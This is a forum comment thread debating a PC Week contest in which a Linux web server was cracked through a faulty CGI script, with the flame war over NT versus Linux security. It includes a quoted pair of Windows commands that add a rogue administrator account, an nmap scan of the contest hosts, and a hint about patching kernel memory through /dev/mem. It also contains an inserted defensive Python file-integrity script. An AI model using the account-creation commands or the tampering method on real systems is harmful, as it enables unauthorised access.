    You do know of course that ZD-Net is essentially a Microsoft flunky. After all... They are owned by SoftBank, and SoftBank (based out of Buffalo, NY) does a LOT of technical support for Microsoft.

    I guess there is no such thing as conflict of interest, so the individual who has never touched Linux in his life, (jesse) can go right on saying what he is saying...

    Remember his little article on "Can you get fired for recommending Linux?" No case studies, no proof...just toeing the Microsoft party line...


    Cheers,

    Nicholas

    PS: In case you haven't guessed a majority of so-called journalists are this way especially on the internet. If it is something they don't understand....oohhh..scary...let's talk bad about it...

  80. Misplaced blame by Zico · · Score: 1

    Not a slam on you, but the problem isn't the contests themselves, or the articles about them. The problem, as you seem to recognize at the beginning (but forgot by the end of your post), are the Linux zealots making the inane posts.

    Your solution seems to be saying, "Hey, don't post stories like this because the Linux community has the inability to discuss them without making complete asses of themselves." I know that's not what you meant, but that's really what it boils down to. It also amounts to putting blinders on to squelch any Linux news that isn't positive, just to not awaken the hordes of clueless Linux zealots that will come out en masse with ridiculous replies.

    The correct request is, "Would the clueless zealots please bugger off? You're not helping a damn thing." Also helpful would be to score their posts down here, as well as quit scoring down posts just because they made a point not in Linux's favor, even when they weren't trolls or flamebait.

    Again, most of what you said was good, but you're just putting the blame in the wrong place.

    Cheers,
    ZicoKnows@hotmail.com

    1. Re:Misplaced blame by gregm · · Score: 1

      I agree with you. The fault is not Slashdot's, nor Linus's, nor those of us who use and (for the most part) love Linux. However Microsoft has their own zealous counterparts but they have a clear advantage. They can (for the most part;) control their people. We as an open-source community cannot and probably should not try. We can however not go out of our way to fuel the fires of our zealots.

      Upon further inspection of my original post and of this post I must conclude my very proposal is about as diametrically opposed to the spirit of Open Source as anything could be. I guess we have to take the good with the bad and hope for the best.



  81. Re:Why the weeping over linux? The NT is vulnerabl by Zico · · Score: 1

    Hey, if the box is still up, post how to hack it. Just make sure you post it before you try it yourself, so I can get that thousand bucks! Oh yeah, and if that machine hasn't been hacked by tomorrow, everyone here will know that you were full of shite -- so get ta crackin'! (Again, after posting the crack here first ;-)

    Cheers,
    ZicoKnows@hotmail.com

  82. indefensible. by Anonymous Coward · · Score: 0

    please stop saying "it's not linux' fault".

    the real issue here is why someone can install software that brings the core of the machine down.

    That's really bad, and reflects a flaw in the system design.

    Granted, if someone *goes out of their way* to give a program/process root privileges, that is not required to have it, then they get what they deserve.

    But no program, proprietary or open, should be able to get those kind of privileges without a system admin specifically and knowingly granting them.

    This sounds like a unix/linux system flaw. Personally, I think unix/linux should have a small tight system space, and anything else (ie, web/mail/ftp) is restricted to user land, and the rule should be hard to break.

    as a user, it would be tough to bring down linux from a shell. services should be no different.

  83. Re:[offtopic] a gender neutral way to say it by Anonymous Coward · · Score: 0
    Ah, but then again, English monarchs have demonstrated a disturbing tendency to refer to themselves as "England", which would reinforce the royal we.

    Especially in light of the curious English custom of referring to collectives as plurals rather than singulars, e.g.:
    Microsoft are a bunch of mindless jerks who will be the first against the wall when the revolution comes,
    versus the much more logical American:
    Microsoft is a bunch of mindless jerks who will be the first against the wall when the revolution comes

    And, for those Douglas Adams fans playing along at home, note that it is my belief that Microsoft IS the Marketing Division of The Sirius Cybernetics Corporation. Share and Enjoy.

  84. Say what? by Zico · · Score: 1

    What part of

    net user SirHackalot mypassword /add /fullname:"Joe Q. Hacker"
    net group administrators SirHackalot /add
    do you not understand?

    Cheers,
    ZicoKnows@hotmail.com

  85. On what theory? by raistlinne · · Score: 2

    On what theory does an OS never allow anything to be done? Someone's got to be able to bring the system down so that someone can do something with the system. If that person is irresponsible, they're a problem. Handcuffing your users so that they can't do anything is not the solution.

    I'm not sure what happened, and the site doesn't seem to say, but if they were running CGI input without checking it they're:
    a) Dumb
    b) Limited to what that CGI can do.

    If they configured their machine so that their CGI can do security leaks, what is the OS supposed to do, say "No, you can't do what you want. Go away and stop trying to be creative?"

    As many people have pointed out, an OS is only as secure as its weakest link. The person at the keyboard is a necessary link, so if they're your weakest link, you're in trouble. The same would go if this was just a bad asp script.

    You might be able to make an argument that the same sort of flexibility doesn't exist on NT and thus you can't do this sort of stuff. While that may be true, do remember that walking is generally safer than driving. When you can do more, you can also go wrong in more ways.

    It all boils down to knowing what you're doing. I forget who said it, but "If you make a device idiot-proof, nature will make a better idiot."

    --
    They laughed at Einstein. They laughed at the Wright Brothers. But they also laughed at Bozo the Clown. -- C. Sagan
    1. Re:On what theory? by HiThere · · Score: 1

      I don't know Inferno, and I don't know Multics, but I like your theory. (I suspect the kernel hacking teams agree with you, in general if not in detail.)

      To me this says: What system design changes should be made so that this kind of thing isn't a problem again. This is sort of difficult. I don't generally worry about secrecy, so my basic answer tends to be "Have a read only copy, compare checksums, if the checksums change, copy the secure version over the accessible version." Unfortunately 1) it doesn't keep the data secret, and 2) it doesn't allow folk to make changes. If these are concerns, then somebody else's idea needs to be used. I think that they were concerns here, though I'm not real sure. (I've only followed the SlashDot discussion).

      --

      I think we've pushed this "anyone can grow up to be president" thing too far.
    2. Re:On what theory? by Anonymous Coward · · Score: 0
      To me this says: What system design changes should be made so that this kind of thing isn't a problem again. This is sort of difficult.

      Actually the changes would be to implement ACL (or make them mainstream in Linux), capabilities and to change programs to use them. Implementing Inferno namespaces could be another step, and going further, one would need a way to specify and control what a given piece of code is allowed to do. For instance I don't find it normal at all that every program can read files in /etc (read all the configurations of all the program), can read my mail file even if it is xclock, or open a WWW connection to any machine connected to my network.

      I don't generally worry about secrecy, so my basic answer tends to be "Have a read only copy, compare checksums, if the checksums change, copy the secure version over the accessible version."

      If the OS is cracked you cannot trust it. Once you are root (and if the Linux machine doesn't use "securelevel"), it is relatively easy to peek in /dev/mem to change any kernel code. You need to stop the machine, boot on CDROM, and then compare. Even then you are not 100% safe against top-level crackers (they would trigger bugs in the unmodified file system code Linux, so that it loads their code anyway... difficult to do, but definitely doable with proper tools and a big amount of work).

      Hint: go in '/usr/src/linux/arch/i386/kernel/entry.S'. This is where any process MUST go to make a system call (thus to access any information on the system). It is pretty easy to see that if you are adding some checks here you can improve seriously the security of the OS. BTW, other checks are added in some of the functions ('securelevel' checks).

      Otherwise you can search for the Linux capability project page, they have some design and code.
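The checksum-and-restore idea from HiThere's comment above, as an added example that is not part of the thread: it fingerprints a known-good copy, moves anything that differs aside as evidence, and restores the original. Following the reply's caveat, it assumes it is run from a trusted environment (for instance after booting from read-only media) with the golden tree on read-only storage; every file name and path below is constructed.

```python
import hashlib
import os
import shutil
import tempfile
from pathlib import Path


def manifest(root: Path) -> dict:
    """Map every file under root (relative path) to a fingerprint.

    Symlinks are never followed: a link is fingerprinted by its target
    string, so swapping a file for a link always shows up as a change.
    """
    entries = {}
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            if path.is_symlink():
                entries[rel] = "symlink:" + os.readlink(path)
            elif path.is_file():
                # Whole-file read is fine for web content; chunk it for big files.
                digest = hashlib.sha256(path.read_bytes()).hexdigest()
                entries[rel] = "sha256:" + digest
    return entries


def audit_and_restore(golden: Path, live: Path, quarantine: Path) -> dict:
    """Compare live against golden, restore differences, keep the evidence."""
    want, have = manifest(golden), manifest(live)
    report = {"modified": [], "missing": [], "unexpected": []}
    for rel in sorted(set(want) | set(have)):
        if want.get(rel) == have.get(rel):
            continue
        target = live / rel
        if rel in have:
            # Move the altered or foreign entry aside instead of overwriting
            # it; a symlink is moved as a link, its target is never touched.
            kept = quarantine / rel
            kept.parent.mkdir(parents=True, exist_ok=True)
            shutil.move(str(target), str(kept))
        if rel in want:
            # The target path is now free, so the copy cannot write through
            # a planted symlink.
            target.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(golden / rel, target, follow_symlinks=False)
            report["modified" if rel in have else "missing"].append(rel)
        else:
            report["unexpected"].append(rel)
    return report


def build_demo(base: Path):
    """Constructed sample: a known-good tree and a tampered live copy."""
    golden, live = base / "golden", base / "htdocs"
    (golden / "cgi-bin").mkdir(parents=True)
    (golden / "index.html").write_text("<h1>Welcome</h1>\n")
    (golden / "about.html").write_text("<p>About us</p>\n")
    (golden / "cgi-bin" / "form.cgi").write_text("#!/bin/sh\necho ok\n")
    shutil.copytree(golden, live)
    (live / "index.html").write_text("<h1>defaced</h1>\n")         # changed page
    (live / "about.html").unlink()                                 # deleted page
    (live / "cgi-bin" / "dropped.cgi").write_text("#!/bin/sh\n")   # foreign file
    (live / "cgi-bin" / "form.cgi").unlink()                       # file swapped
    (live / "cgi-bin" / "form.cgi").symlink_to("/nonexistent/elsewhere")  # for a link
    return golden, live


def run_demo():
    """Return (report, live matches golden afterwards, quarantined paths)."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        golden, live = build_demo(base)
        report = audit_and_restore(golden, live, base / "quarantine")
        clean = manifest(live) == manifest(golden)
        kept = sorted(manifest(base / "quarantine"))
        return report, clean, kept


if __name__ == "__main__":
    report, clean, kept = run_demo()
    print(report)
    print("live tree matches golden copy:", clean)
    print("quarantined for investigation:", kept)
```

Content hashes do not cover ownership or permission bits, so a file that was only made writable or setuid would need a separate mode comparison.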

  86. Re:I find it interesting that ZDnet ruled out... by k9-quaint · · Score: 1
    Ah, good point. RAS was not on the NT web server in question? or is that a presumption. Do people install/configure RAS on their webservers? If so, I sure hope Microsoft thought about security when they coded RAS, otherwise that would be a huge back door :)

    Unix machines are by nature multiuser environments where any user with privileges can execute instructions on that machine from anywhere. NT was first and foremost a file/print server, second an application server, and lastly a timeshare machine.

    One more question, does RAS change the flavor of NT from vanilla to strawberry? or is that a default install option for workstation and/or server?

  87. Re:[offtopic] a gender neutral way to say it by rossarian · · Score: 1

    I propose a new gender-neutral pronoun, which
    will solve all of these problems. It combines
    'she', 'he', and even 'it', in a paradigm-shifting and wholly accurate pronoun:

    shit.

    --Andrew

  88. Re: That's not an OS crack you idiot by Alascom · · Score: 1

    >...because of one typo...

    Apparently security is not a specialty of yours. Most security problems ARE the result of "typos" and small errors. If the code was written incorrectly, and I use that to intercept users or information, how can you deny it's a clean hack. Apparently, you young kids who watch a movie or read a book and think you're hackers don't really understand what hacking is... It's not always the cool "click the pi symbol and get into the FBI Mainframe." The contest said a valid win was stealing user information, so if they make a typo and I use that to intercept users when they click links, then intercept information from those users, it's a clear success. In the real world, the results could be FAR more insidious.

    -Alascom

  89. Re:knee jerk reactions by MassacrE · · Score: 1

    Because human setup and overconfigurability are UNIX traits. NT does everything for you and does many things poorly. So when an NT box gets hacked it is almost always a flaw in the Operating System level (Including IIS, which is now part of the OS) or in the default configuration.

    Nothing is going to happen to apache in the default configuration. But if you get all stupid about configuring it you are opening the floodgates. For instance, using a closed-source CGI script and giving it stupid permissions.

  90. Here are the facts..quickly.. by NikoDemous · · Score: 1

    Linux has many services which must be secured.
    Installing ssh, or mod_ssl, shutting off some services, applying the latest patches are all part of good system administration. I dare say I've had boxes running for 4 years and more that people have attempted to crack but for good diligence they might have been successful.

    NT is not the world's most secure solution either. In fact NT as installed flunked the security tests we placed on it as did Linux. Both systems need COMPETENT administrators. A computer is just a tool people. Although I must say (with bias on my part...to be honest) that Microsoft breeds the lazy mentality of "The computer is a magic box" and doesn't really encourage the user/admin to go into it in depth. I've had an MCSE say to me once. "I just want proxy services.. I don't want any IP packets routed across the network." As though "Proxy Services" were a Microsoft magic or something...very strange indeed.

    The real factor is reliability. NT just doesn't scale right now. Maybe it will in the future, but right now it does not. The company of which I am a part has done well over 3,000 installations in medium to large companies all of which have had heterogenous complement.

    Lose the "My dog is better" stuff and subscribe to some security newsletters etc. Study systems security.

    Cheers,

    Nicholas

  91. Try using the defaults then by raistlinne · · Score: 2

    Well, if you're actually running your CGI scripts as root you're just asking someone to break you. By default, CGI scripts are run as the user nobody. Nobody owns no files, is part of no group, and has no login shell. In short, if they compromised a normal cgi script they shouldn't be able to do much more than fill /tmp up. That and read publicly available files.

    And as soon as you can break into some code running as administrator (or the OS itself, that is something like a third of the code, isn't it?), you can just install BO or something like that and get some decent remote-administratability options.

    NT is no more inherently secure in a full security-breach than Linux is. In either case you're screwed if someone can compromise the superuser. And NT has plenty of services either running as administrator or in kernelspace. Can you even run a daemon-like service as a regular user under NT?

    --
    They laughed at Einstein. They laughed at the Wright Brothers. But they also laughed at Bozo the Clown. -- C. Sagan
  92. Why isn't a Mac involved? by toupsie · · Score: 1

    It would appear if PC Week wanted to have a fair contest, PC Week would have set up a B&W PowerMac G3 serving with WebStar. Why didn't they include a PowerMac G3 in contest? Probably because they know what all Mac users know -- You can't hack a Mac over the Internet! If you visit Attrition.org's hacked web pages archive, you will notice that in the many years of cataloging hacks none of them are Mac servers. Majority of them are Linux and NT boxes. Face it, NT and Linux are inherently insecure by their design. The average MacOS user can set up a web server faster and more secure than the best Linux guru. On top of that, you don't need a firewall to protect the Mac like you do for the lowly Linux or NT server.

    Only Apple's MacOS is the secure platform for serving web pages. Just ask the Army. They have seen the light and moved to Mac. If all web servers were MacOS based, the concept of hacking web sites would be moot. Open Source does not mean more secure. If it did, then Linux would have better net security than the closed source MacOS. Clearly this contest has proven, once again, that Linux is an insecure platform to serve web pages.

    Free != Better
    MacOS Net Security > Linux Net Security
    Game, Set, Match, Apple!!!

    --
    Strange women lying in ponds distributing swords is no basis for a system of government.
  93. Re:Real world usage. by Anonymous Coward · · Score: 0

    What about a DMZ? Does anyone really put their webserver inside their trusted network!!??!

  94. I find it interesting that ZDnet ruled out... by k9-quaint · · Score: 3
    Denial of service attacks. To which NT is notoriously prone and to which Linux is not. I am not talking about packet storming, but rather boundary cases in the protocol stacks that cause crashes(BlueSoDs) and kernel panics.

    Since vanilla NT has virtually no remote administration or remote anything capabilities, it had a natural advantage in this test. Turn off NT File Serving, and you have to put machine code on the stack to change files (annoying and not worth $1000). On Linux, I could just root the machine and then enable telnet, configure the shell of my choice, set all my little aliases, and it would be just like home.

    IMHO, NT is more secure out of the box than most Linux distros. If you want perfect security, may I recommend a piece of wood (not as much functionality as NT, but very very secure).

  95. Please stop this nonsense by Anonymous Coward · · Score: 0

    I do mean it. Give them the publicity they earn, none. All those "Hack my pocket calculator" contests are ridiculous, result in a lot of foaming mouths, quite a lot of wasted bandwidth and ought to be redirected to /dev/null. Even "Man Bites Dog" makes for a more interesting headline and if the dog was made by Sony it might even qualify for ./

  96. Why was this moderated up? The subject maybe? by ph43drus · · Score: 1
    Gavin, I'll give you the point that there are no /perfect/ Operating Systems and that security has to be based on everything running. I would like to point something out to you though:

    Modern Computers are /Complex/, therefore, to get the most out of them, you are going to be dealing with something complex

    You go and wait for the perfect operating system. Tell me about it when it gets written. I'm going to work with what is out there now.

    -Jeff

  97. Rules by zempf · · Score: 4

    The rules state:



    The only fair targets are the securelinux.hackpcweek.com, and securent.hackpcweek.com sites. To win the 1000 gift certificate you must mark up the home page or steal a file called top secret. Denial of Service attacks spoil it for everyone, and get nothing accomplished.



    That's it. If that's all they have for official rules, then this guy should get the cash. While s/he (so as not to offend all those female crackers :) didn't exploit an OS-specific hole, the rules didn't say s/he had to, so it looks like PCWeek is out a grand on the deal. Oh well.

    Looks to me like next time they need to include some fine print like every other contest does :)

    -mike kania

  98. PHEAR! Let's examine the facts, first by Anonymous Coward · · Score: 1

    Before everyone starts flaming PC Week about how they don't know how to admin UNIX, etc. Everyone's pretty quick to jump on the wagon when an NT box is hacked, regardless of the NT admin's ability.

    1. Re:PHEAR! Let's examine the facts, first by JohnG · · Score: 1

      Trying not to sound like the Linux Advocates everyone seems to hate let me just say if you want to look at the REAL facts then you have to look at REAL life. You have to look at the number of attempts on each box and the level of skill of the administrators. More importantly to solve the NT is insecure argument talk to someone who works with it. I know a guy that works on our county machines which are NT and he could tell me exactly how to get into it through various holes. Or watch ZDTV once in a while. MS has been hacked something like 8 times in two months. Hotmail twice I know. All these computers were administered by MS. Look at all the complaints about Hotmail's lack of speed and security since the switch to NT. Security isn't the only aspect of a good Web Serving OS. You have to look at Stability, Speed, etc. In real life there won't be thousands of hackers going after the average site. There will however be thousands of users who expect good service. Speaking of which did anybody here go to the hackpcweek site when slashdot first announced it? For me at least the NT box took three or four times as long to load as the Linux box. Looks like Linux is more suited to handle the Slashdot effect to me.

    2. Re:PHEAR! Let's examine the facts, first by Anonymous Coward · · Score: 1
      Well, could it be because every time one of these "tests" shows up, they seem to have all the help from Redmond they need to set up a "secure" NT box but usually don't make too much of an attempt to get help setting up the linux box?

      No one here is claiming that linux is "easy" to set up securely. You definitely have to know what you are doing (obviously pcweek did not). But MS seems to want everyone to believe that with Windows, even a monkey could do it, but yet it always seems to take a bunch of help from MS itself to get these things working properly. If they weren't such hippocrates, we might not be so tempted to call their bluff.

    3. Re:PHEAR! Let's examine the facts, first by cernnunous · · Score: 3

      Linux is not that easy to set up securely. And obviously, looking at the LONG list of non-standard changes made to the NT box, neither is NT.

      The point of this test is moot, since really neither OS was compromised. It was a flawed CGI script, just like the one that brought down Hotmail.

      Like many others have said already: pay up to the guy that got in. Then fix the flawed CGI (or release the source so that somebody who's competent can), and run it again. Once all the bugs are gone from the "add-ons" on both servers, then maybe we'll begin to see which is the more secure and stable OS.

      I admin both NT and Linux boxes at work. I know which of the two I can rely on to stay running and keep unwanteds out. I don't think it makes me a "Linux Zealot", perhaps it just means I find Linux easier and more intuitive to admin. If somebody else finds NT to be more stable and secure for them, more power to them.

      john

    4. Re:PHEAR! Let's examine the facts, first by Hiro_Protaganist · · Score: 1

      If they weren't such hippocrates

      First that I have seen about MS claiming ownership of medical ethics... KEEP BILL GATES OUT OF MY HMO!!!

      --

      _________
      Sometimes, when I'm feelin' bored, I like to take a necrotic equine and assault it physically.

  99. HA by Anonymous Coward · · Score: 0

    I can already hear the MS marketing department giggling with girlish joy. "Linux was hacked but 2 NT sites stayed up (win2ktest.com and the Pcweek site)"

    Sometimes it's just too easy...

  100. Re:Test BOGUS. Linux is UNHACKABLE. PERIOD. by Captain+Spam · · Score: 1
    Wow, authentic second-guessing, right there.

    That typically leads to third-, fourth-, and fifth-guessing. Man, that takes me back a while... it's been a while since I've seen some of that.

    And I'm thankful for that. Don't feed the trolls.

    ------------

    --
    Demanding constant attention will only lead to attention.
  101. Re:[offtopic] comment by Anonymous Coward · · Score: 0

    Your comment should read: // The floggings will continue until morale improves. Trust me, I know. My World History (H) teacher has it posted on his wall!

  102. Fair fight by jafac · · Score: 2

    In the immortal words of Grimjack:

    "I only believe in a fair fight when I can't rig it in my favor."



    "The number of suckers born each minute doubles every 18 months."

    --

    These are my friends, See how they glisten. See this one shine, how he smiles in the light.
  103. Re:CGI Script Security by sreilly · · Score: 1


    You obviously didn't read the description of the hack or you would know that the web server wasn't running as root - it was running as nobody. He got root by exploiting a bug in crontab that allowed user nobody to get root access. Granted, he shouldn't have had permission to overwrite the other CGI script in order to get a shell, but the crontab is what allowed him to eventually get root.

    And to those who claim that the reason he got in was because it was a closed-source CGI script - give me a break! The cracker had the source to the script, otherwise he wouldn't have gotten in. Don't be so naive as to believe that all open-source cgi scripts are secure.



  104. cute by jabbo · · Score: 3

    but just more worthless speculation.

    "Absurdly complex" appears to be quantifiable when one OS has something like 20 million lines of code and the other something on the order of 2 million.

    One advantage Linux has is that it is relatively easy for a competent user to configure it the way he/she wants to. This appears to be much more difficult under NT. The "lots of little tools" philosophy isn't there -- a complex aggregate which cannot be broken down into simpler pieces is harder to understand and analyze than one that can.

    In any event, anything worth doing is usually pretty tough. There's no competitive advantage in offering a service Just Like Everyone Else's, and doing easy, fully understood things isn't much fun. This goes far beyond OSes and webservers.

    /Life/ is absurdly complex. Get used to it.

    --
    Remember that what's inside of you doesn't matter because nobody can see it.
  105. The point by fnj · · Score: 4

    Everyone so far has missed the point. This isn't (or shouldn't be) a one time thing. Both servers should be left there forever, subject to ongoing attacks. No need to pay anyone anything (maybe a T shirt or something). I think there'll be plenty of entrants without any big reward being needed.

    NT gets better, Linux gets better. I don't have any axe to grind, and this outcome would please me. Better operating systems; who can be against that?

  106. Re:Sounds like a valid result to me by magpie · · Score: 1

    Well, in response from a person who uses NT due to my work & linux by choice:

    The comment about the whole system has an obvious flaw: both linux & NT can be incredibly easy to crack if the CGI scripts are bad or you run bad services/daemons. This leads me on to my next point. Since the MS system forces XYZ try settings, then if there is a slight flaw in the setup it is repeated in all servers. The linux view of "here's the system" means that there is a very good chance that one hole will not appear in all servers.

    This brings me to the simple fact that if you employ people who can't secure a server and have to rely on the software to do it for them (automatically), then you don't value your security, simply because no two configs are the same and no two requirements are the same.

    What it boils down to is linux/unix/*BSD is as secure as you want (at the cost of additional services and the requirement for better IT staff); NT tends to be as secure as MS believes it should be. It's a simple choice. Though the fact is a badly set up linux box is easier to crack than a standard NT box, but a well set up linux/unix/*bsd box is more secure. It depends how much security matters to you.

    (forgive the spelling (there's no cure for dsylexia, thank god(s)))

  107. CGI Script Security by Anonymous Coward · · Score: 5
    This test was a farce to begin with ...

    If the web server is running as nobody, then shouldn't the CGI script be running as nobody too? No competent web server admin would allow the root docs directory to have 666 permissions or run the web server as root. Was this CGI script 4755, or was the directory set up with bad permissioning?

    I could see exploiting a CGI script to get it to email you a sensitive file or display sensitive information, but they must have had the web server misconfigured to make it that easy to change a page in the doc root.

    1. Re:CGI Script Security by stoend · · Score: 1

      If the CGI script was owned by nobody then it is logical the webpage was also owned by nobody and possibly had the permissions 4600; therefore, the CGI script possibly had write access to the webpage.

  108. What if IIS had the hole? by |DaBuzz| · · Score: 3

    If someone had broken into NT via IIS would we still be saying "it's not the OS's fault"? I doubt it.

    What I would like to know is, did the CGI ship with the RH distro they used ... if so, that's part of the OS in my book just as IIS shipping with NT is part of the OS when used in that fashion.

    1. Re:What if IIS had the hole? by Hall · · Score: 2
      What I would like to know is, did the CGI ship with the RH distro they used ... if so, that's part of the OS

      It's not likely that RedHat includes it. As has been mentioned, it's a closed-source program and RedHat has stopped including any and all closed-source or commercial programs with their distribution.

    2. Re:What if IIS had the hole? by Anonymous Coward · · Score: 1

      No we would not be saying "it's not the OS's fault" if IIS had been cracked. Isn't IIS part of the OS (at least according to microsoft)? That's part of their whole integration deal right? Make everything part of the OS. They did it with IE.

    3. Re:What if IIS had the hole? by witz · · Score: 1

      IIS is not "part" of the OS. It's an installable option, just like Apache with RH 6. You can also download it separately.

    4. Re:What if IIS had the hole? by zifnab · · Score: 1

      Does it run on anything else than Windows NT? Apache has really no relation with RH because it doesn't rely upon it. It even works on Windows.
      --

      --
      Memory fault -- brain fried
  109. Jfs Reply to me saying it wasn't the OS fault by MarNuke · · Score: 1

    If the guy that hacked it says it was because of the OS but because of the CGI scripts I would think about it and might believe it. But coming from the person that hacked it saying IT WASN'T an OS problem but some third party CGI script with a neon sign pointing and flash "HEY HERE'S THE DOOR, make yourself at home" I would think it was a PR stunt put on by Microsoft.

    --
    MarNuke
  110. A zen troll. Now I've seen everything. by Anonymous Coward · · Score: 0

    Of course, getting to define 'competent user' is the fun part. "Why, when I was your age, I had to trudge 30 miles in the snow to run VMS...but I was *thankful*!" Some days, this place seems as intellectually recursive as the SCA.

  111. wrong by MarNuke · · Score: 1

    It doesn't matter what OS you use, NT, Windows 95, OS/2, AIX, Solaris, Linux, FreeBSD, WHAT EVER!!! IF you run a CGI script with a massive hole in it you will get hacked. It's just that simple.

    --
    MarNuke
  112. Hehe, nice skewed contest by Anonymous Coward · · Score: 0

    It's obvious, isn't it? "Linux is less secure than NT." I mean, the Linux box was compromised before the NT box, never mind that work was done to secure the NT box and none was done to secure the Linux box... Another great publicity stunt by ZDLabs. Surprise, surprise.

  113. That was expected by Enoch+Root · · Score: 1
    I wish crackers had been a bit more brilliant in realising this was obviously a rigged contest. They should have left the Linux box alone and concentrated on NT. I'm surprised it wasn't done, given that, if I had the choice between cracking Linux or NT, I'd go for NT; it's much easier.

    But no... I get $1000 is enough to step on your integrity. And so, just watch Microsoft use that as FUD.

    "There is no surer way to ruin a good discussion than to contaminate it with the facts."

    1. Re:That was expected by Anonymous Coward · · Score: 1

      Actually I gotta disagree. It is far easier to hack a poor CGI script than an ASP. For $1000 why not go for the simple route: CGI flaws.

    2. Re:That was expected by Anonymous Coward · · Score: 1

      Yep.

      Everyone should concentrate on hacking the NT box.

      We can dress the Linux box in diapers and send it "atta boy" packets every once in awhile. Maybe even launch a DOS attack on it so nobody can get near it to hurt the little dear.

  114. Re:Test BOGUS. Linux is UNHACKABLE. PERIOD. by Shane · · Score: 1

    Hmmm I can not believe that any Linux user would be so seriously blind as to make such a statement.

    Therefore you must be a Microsoft user sent to make linux users look bad :)

    Good logic huh? hehe

    --
    -- You can be a geeklord too :)
  115. What the fuck? by Anonymous Coward · · Score: 0

    Can you not read? The post says it's a bug in a CGI they wrote. If it was an OS test then it's their fault for not duplicating the bug in the NT server.

  116. They shoulda read the LASG by Anonymous Coward · · Score: 3

    Linux Administrator's Security Guide http://www.securityportal.com/lasg/

  117. Re:Must Resist by fat_mike · · Score: 2

    All of these contests are designed for Linux to lose. Although PC Week has been expanding their coverage of Linux, what is PC Week? It is a magazine oriented towards Windows users. Look through their ads. 99% of their ad revenue is for products for Windows.

    The way I see it, there is no real way to test the two operating systems against each other. Somebody will always find something wrong with the test criteria, someone else will scream conspiracy and the whole thing starts over again. Who cares if Linux got hacked first. It doesn't matter. I use Linux because I enjoy it, not because it is "hack-proof". I find it easier to get the things done that I do.

    There is no such thing as a 100% secure server. Somebody is always going to find a way to get in. These tests are designed to convince corporate big shots to use one or the other. It's going to come down to CIOs actually listening to what their Sys Admins' real world tests showed for their business, not somebody else's. Your business and systems are completely different than mine. I'm not going to use NT or Linux just because it works for you.

    This is not intended as flamebait. I'm just tired of this. It's like all of a sudden Linux and NT need to be on the cover of Consumer Products magazine or something.

    My name is Matt and I'm a Linuxholic
  118. That's it! by Anonymous Coward · · Score: 2

    All right that's the final straw! I'm switching back to NT right now!

  119. What's notable is what's lacking on the site by emag · · Score: 5

    Try going to the server configs page at www.hackpcweek.com. Note that there are configs solely for securent, none at all for securelinux. Far be it from me to be paranoid, but this lack of information leads me to suspect that the configuration of the linux server was far from optimal (even if it was hacked via a faulty closed-source CGI script). After all, if the linux box had been secured, the maintainers would know which config files had been modified, what patches needed to be applied, etc. Instead we get "reinforcement" of how "well-documented" everything in NT is, and how "poorly documented" linux is.

    Also, if anyone happened to nmap the two boxen, they probably found the same thing I did...both are behind a firewall and return *identical* scans (aside from hostname):


    Starting nmap V. 2.3BETA6 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
    Interesting ports on securelinux.hackpcweek.com (208.184.64.170):
    Port    State       Protocol  Service
    21      open        tcp       ftp
    23      open        tcp       telnet
    25      open        tcp       smtp
    70      open        tcp       gopher
    80      open        tcp       http
    119     open        tcp       nntp
    139     open        tcp       netbios-ssn
    420     filtered    tcp       smpte
    443     open        tcp       https
    1080    filtered    tcp       socks
    TCP Sequence Prediction: Class=truly random
                             Difficulty=9999999 (Good luck!)
    Remote operating system guess: AXCENT Raptor Firewall running on Windows NT 4.0/SP3
    Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds



    What's this? These machines are so secure that they need to be protected by a firewall? Why? Are there possibly ports on one of them that can't be disabled any other way? This is mere speculation, but if you're running a contest to show the security of a specific box, do you add external security on top of it?

    --
    "The urge to save humanity is almost always a false front for the urge to rule." --H.L. Mencken
    1. Re:What's notable is what's lacking on the site by seoman70 · · Score: 1
      On their site they said they wanted to test under real-life conditions. In most corporate situations, this means a firewall.

      As to whether I think that's fair or not is another matter.

      --

      [Seoman] "A conclusion is simply the place where you got tired of thinking."

    2. Re:What's notable is what's lacking on the site by kevlar · · Score: 1

      They're behind firewalls specifically so that they can limit the attack to httpd. This leads me to assume that they aren't trying to have a "most secure os" contest, but rather they want to figure out where the hole is in NT IIS, because we all know there's a really big one. No one will give away the secret though.

  120. Too many variables - Yes and No by DiningPhilosopher · · Score: 3

    Well, assuming they could find two equally knowledgeable sysadmins (each relative to his/her platform - yes, this is difficult) and assuming each was allowed to choose the server, scripts, etc. to be used on that platform it's a worthwhile test. It doesn't have to be the same software to be valid.

    If you had a flawless operating system but the only applications available for it were crap you would have a bad server platform. In other words, there's a difference between testing an OS and testing a platform.

    (Note: I'm not arguing that the case I described is the case with the linux box in the contest - linux is not flawless and apache is not crap. I know it was a bad script and this reflects badly on almost nothing else. I'm just making a point about the hypothetical validity of this kind of testing)

    --
    /* The beatings will continue until morale improves. */
    1. Re:Too many variables - Yes and No by David+Gould · · Score: 1


      Right. The different toolsets available for the respective systems should be considered in rating them. That is, if a program exists for one and not the other, and it is better than the nearest equivalent on the other system, then that should be counted as a "point" in favor of that system.

      I put "point" in quotes because it should not actually be counted directly, as in a checklist. Instead, the best tool should be used on each system in performing the test, and whatever advantage it gives will automatically reflect well on that system.

      Rather than requiring both systems to use the same software, the testers should spend similar amounts of effort and expertise looking at the tools available for each system and selecting the best they can find.

      David Gould

      --
      David Gould
      main(i){putchar(340056100>>(i-1)*5&31|!!(i<6)<< 6)&&main(++i);}
  121. Sour Grapes - linux lost by Anonymous Coward · · Score: 0
    You're just pissed that linux lost.

    Whenever an NT test from any lab comes up with bad results, no one challenges them.

    When linux (the most insecure out of the box OS around) gives a bad result, you all scream like scorched cats.

    I'm not a MS employee or an NT user, but I can tell you that my experience with Red Hat in particular is that the default install is ridiculously insecure. Red Hat is shipping hackware.

    1. Re:Sour Grapes - linux lost by washort · · Score: 1

      > When linux (the most insecure out of the box OS around) gives a bad result, you all scream like scorched cats.

      Which box? ;-) Debian, for example is much more secure "out of the box" than Red Hat. Linux doesn't just come in one box. :)

    2. Re:Sour Grapes - linux lost by Megaweapon · · Score: 2

      my experience with Red Hat in particular is that the default install is ridiculously insecure

      Then your gripe is with Redhat. Linux didn't lose, poor CGI administration lost. Linux just executed their insecure code.


      --
